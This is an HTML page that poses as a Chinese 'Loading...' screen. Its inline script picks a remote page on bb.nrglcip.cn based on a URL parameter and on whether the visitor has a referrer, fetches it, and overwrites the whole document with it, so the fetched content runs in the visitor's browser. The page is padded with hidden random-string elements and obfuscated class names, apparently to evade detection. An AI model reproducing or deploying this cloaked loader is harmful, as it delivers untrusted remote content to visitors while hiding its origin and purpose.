<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .GBD4ey0y {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .GBD4ey0y .xgY5d3pr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .GBD4ey0y .content {
            line-height: 50px;
            text-align: center
        }

        .GBD4ey0y .img {
            width: 100%
        }

        .GBD4ey0y .zR5MyO {
            text-align: center
        }

        .GBD4ey0y .zR5MyO span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .GBD4ey0y .zR5MyO span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .GBD4ey0y .zR5MyO span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .GBD4ey0y .zR5MyO span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .GBD4ey0y .zR5MyO span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .GBD4ey0y .zR5MyO span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .GBD4ey0y .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QKJVoVZqb1gl(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var yuPdHU = QKJVoVZqb1gl('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ yuPdHU +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ yuPdHU +".html?a=share";
		}
		
        UCYTnFrj=url+"#"+new Date().getTime();
        UCYTnFrj && function() {
            $.get(UCYTnFrj, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>ohKSDRigK46ZrEyoK9w3d0NhbZKPMtdDyN5GBaiEuCk7aeBhdDRBUwLX7zqXA9Zw0ekMCGLfn2KOZ4ghon7nm</span>
<b style='display:none' >j6O46rDOwR0zMvhPTJECrwQ8gxZb3r9TmOBt</b>
<h1 style='display:none' >N0tI8pjfFbZXqu0bdvkboXuZyPJXstFtUy2WOLZrnMR7iY</h1>
<span style='display:none'>ohKSDRigK46ZrEyoK9w3d0NhbZKPMtdDyN5GBaiEuCk7aeBhdDRBUwLX7zqXA9Zw0ekMCGLfn2KOZ4ghon7nm</span>
<h1 style='display:none' >N0tI8pjfFbZXqu0bdvkboXuZyPJXstFtUy2WOLZrnMR7iY</h1><div class="GBD4ey0y">
    <div class="xgY5d3pr">
        <div class="zR5MyO">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>Ssw0x9DvQutLJut</p>
<ul style='display:none' >VjTElvPwIWCQ53iUKfq9ddC7RkaDRfTB0pmrrgsvWYfqnrGFmJd69iqa0YE3LlAm1KHbIOxbsFf3qCv3jXfhJg</ul>
<p  style='display:none'>Ssw0x9DvQutLJut</p>
<li style='display:none' >Ty3FyDMAHtRCSX2dhAS74yfm14GW2onmkPgASuVW</li></body>
</html>